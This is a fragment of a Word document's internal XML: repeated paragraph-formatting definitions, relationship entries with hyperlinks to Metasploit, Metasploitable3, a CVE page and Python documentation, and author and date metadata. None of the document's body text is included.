      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="933636498">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1348871237">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1354841834">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1412922863">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1453207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rapid7/metasploitable3"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nvd.nist.gov/vuln/detail/CVE-2017-0144" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.python.org/3/library/http.server.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metasploit.com/"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11</Pages>
  <Words>846</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Jawad</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mohammed Jawad</cp:lastModifiedBy>
  <cp:revision>26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-09T01:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-09T21:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>